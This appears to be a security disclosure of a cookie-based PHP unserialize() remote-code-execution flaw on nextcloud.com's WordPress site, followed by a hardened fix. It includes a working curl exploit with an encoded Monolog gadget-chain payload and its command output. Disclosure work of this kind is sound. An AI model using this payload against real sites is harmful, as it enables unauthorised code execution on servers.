There is a trivial-to-exploit remote code execution vulnerability on nextcloud.com: a cookie value is passed straight to unserialize(), so any PHP object an attacker serializes into that cookie is instantiated on the server, and no authentication is needed to send it. The following request makes the host execute system('id'). As gadget chain I've used Monolog, which is included in the PodLove WordPress plugin used on nextcloud.com:
curl -i -s -k -X $'GET' \
-H $'Host: nextcloud.com' \
-b $'nc_cookie_banner={\"essentials\":true,\"convenience\":false,\"statistics\":{\"matomo\":false},\"external_media\":{\"youtube\":false,\"vimeo\":false}}; wp-wpml_current_language=en; nc_form_fields=TzozNzoiTW9ub2xvZ1xIYW5kbGVyXEZpbmdlcnNDcm9zc2VkSGFuZGxlciI6NDp7czoxNjoiACoAcGFzc3RocnVMZXZlbCI7aTowO3M6MTA6IgAqAGhhbmRsZXIiO3I6MTtzOjk6IgAqAGJ1ZmZlciI7YToxOntpOjA7YToyOntpOjA7czoyOiJpZCI7czo1OiJsZXZlbCI7aToxMDA7fX1zOjEzOiIAKgBwcm9jZXNzb3JzIjthOjI6e2k6MDtzOjM6InBvcyI7aToxO3M6Njoic3lzdGVtIjt9fQ==' \
$'https://nextcloud.com/newsletter/'
The last lines of the response contain the output of the id command (it appears once per unserialize() call on the cookie):
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
The unserialize() call in both code paths below is performed on user input: $_COOKIE['nc_form_fields'] is base64-decoded and unserialized with no allowed_classes restriction, so any object in the cookie is instantiated with attacker-chosen properties and its magic methods (here the destructor) run.
add_filter( 'ninja_forms_render_default_value', 'nc_change_nf_default_value', 10, 3 );
// Called once per rendered Ninja Forms field, so the cookie is unserialized repeatedly.
function nc_change_nf_default_value( $default_value, $field_type, $field_settings ) {
    if(isset($_COOKIE['nc_form_fields'])){
        // Sink: attacker-controlled cookie, base64-decoded and unserialized without allowed_classes.
        $nc_form_fields = unserialize(base64_decode($_COOKIE['nc_form_fields']));
        if( str_contains($field_settings['key'], 'name') && !str_contains($field_settings['key'], 'organization') ){
            if(isset($nc_form_fields['nc_form_name'])) {
                $default_value = $nc_form_fields['nc_form_name'];
            }
        }
        if( str_contains($field_settings['key'], 'email') ){
            if(isset($nc_form_fields['nc_form_email'])) {
                $default_value = $nc_form_fields['nc_form_email'];
            }
        }
        if( str_contains($field_settings['key'], 'phone') ){
            if(isset($nc_form_fields['nc_form_phone'])) {
                $default_value = $nc_form_fields['nc_form_phone'];
            }
        }
    }
    return $default_value;
}
add_filter( 'ninja_forms_render_options', function( $options, $settings ) {
    //https://www.html-code-generator.com/php/array/languages-name-and-code
    $languages_list = array(
        'en' => 'English',
        // [snip]
        'zu' => 'Zulu - isiZulu'
    );
    if(str_contains($settings['key'], 'language')) {
        $options = [];
        $browser_lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);
        $pref_lang = '';
        if(isset($_COOKIE['nc_form_fields'])){
            // Second sink: the same cookie is unserialized again for the language selector.
            $nc_form_fields = unserialize(base64_decode($_COOKIE['nc_form_fields']));
            if( isset($nc_form_fields['nc_form_lang'])){
                $pref_lang = $nc_form_fields['nc_form_lang'];
            }
        } else {
            $pref_lang = $browser_lang;
        }
        foreach($languages_list as $code => $language) {
            $selected = false;
            if($pref_lang == $code){
                $selected = true;
            }
            $options[] = [
                'label' => $language,
                'value' => $code,
                'calc' => 0,
                'selected' => $selected
            ];
        }
    }
    return $options;
}, 10, 2 );
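The fix is to stop deserializing PHP objects from the cookie at all. Below is an added example of the hardened form (my own code, not the nextcloud.com theme's): one reader that expects JSON in the cookie, which can only produce arrays and scalars, and that keeps nothing but the four keys the two filters actually use. The filter names and arguments are the Ninja Forms ones used in the original code, and sanitize_text_field(), sanitize_email() and sanitize_key() are the WordPress helpers, so this assumes it runs inside WordPress as the original does. A second function shows the stopgap for a cookie format that cannot change immediately.

```php
<?php
// Added example (not the site's own code): hardened replacement for the two
// unserialize(base64_decode($_COOKIE['nc_form_fields'])) calls shown above.

function nc_read_form_fields(): array {
    static $cache = null;
    if ($cache !== null) {
        return $cache;                          // decode the cookie once per request
    }
    $cache = [];
    if (!isset($_COOKIE['nc_form_fields']) || !is_string($_COOKIE['nc_form_fields'])) {
        return $cache;
    }
    $raw = base64_decode($_COOKIE['nc_form_fields'], true);   // strict mode: reject non-base64 input
    if ($raw === false) {
        return $cache;
    }
    // json_decode() builds arrays and scalars only: there is no class to instantiate,
    // so no __wakeup()/__destruct() gadget can run whatever the cookie contains.
    $data = json_decode($raw, true);
    if (!is_array($data)) {
        return $cache;
    }
    // Allow-list the expected keys and sanitize each value for its use.
    $allowed = [
        'nc_form_name'  => 'sanitize_text_field',
        'nc_form_email' => 'sanitize_email',
        'nc_form_phone' => 'sanitize_text_field',
        'nc_form_lang'  => 'sanitize_key',      // language codes such as "en"
    ];
    foreach ($allowed as $key => $sanitizer) {
        if (isset($data[$key]) && is_string($data[$key])) {
            $cache[$key] = $sanitizer($data[$key]);
        }
    }
    return $cache;
}

// Stopgap only, if clients still send PHP-serialized cookies: with
// allowed_classes => false any object becomes __PHP_Incomplete_Class, whose
// magic methods never run, and the result is discarded unless it is an array.
function nc_read_form_fields_legacy(string $cookie): array {
    $raw = base64_decode($cookie, true);
    if ($raw === false) {
        return [];
    }
    $data = @unserialize($raw, ['allowed_classes' => false]);
    return is_array($data) ? $data : [];
}

add_filter('ninja_forms_render_default_value', function ($default_value, $field_type, $field_settings) {
    $fields = nc_read_form_fields();
    $key = (string) ($field_settings['key'] ?? '');
    if (str_contains($key, 'name') && !str_contains($key, 'organization') && isset($fields['nc_form_name'])) {
        return $fields['nc_form_name'];
    }
    if (str_contains($key, 'email') && isset($fields['nc_form_email'])) {
        return $fields['nc_form_email'];
    }
    if (str_contains($key, 'phone') && isset($fields['nc_form_phone'])) {
        return $fields['nc_form_phone'];
    }
    return $default_value;
}, 10, 3);

add_filter('ninja_forms_render_options', function ($options, $settings) {
    if (!str_contains((string) ($settings['key'] ?? ''), 'language')) {
        return $options;
    }
    $languages_list = ['en' => 'English', 'zu' => 'Zulu - isiZulu'];   // full list as in the original
    $fields = nc_read_form_fields();
    $pref_lang = $fields['nc_form_lang']
        ?? substr((string) ($_SERVER['HTTP_ACCEPT_LANGUAGE'] ?? ''), 0, 2);
    $options = [];
    foreach ($languages_list as $code => $language) {
        $options[] = ['label' => $language, 'value' => $code, 'calc' => 0, 'selected' => $pref_lang === $code];
    }
    return $options;
}, 10, 2);
```

The code that sets nc_form_fields has to be changed in the same deployment to write base64(JSON) instead of base64(serialize()), otherwise the reader simply returns an empty array and the prefill silently stops working. The allowed_classes stopgap still hands attacker input to the unserialize() parser, so treat it as a temporary measure and not as the fix.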
RCE on the nextcloud.com WordPress instance. I have not tried to escalate beyond the host, but I'd assume there is plenty of privilege escalation potential (or at least the ability to set malicious download links for the Nextcloud binaries).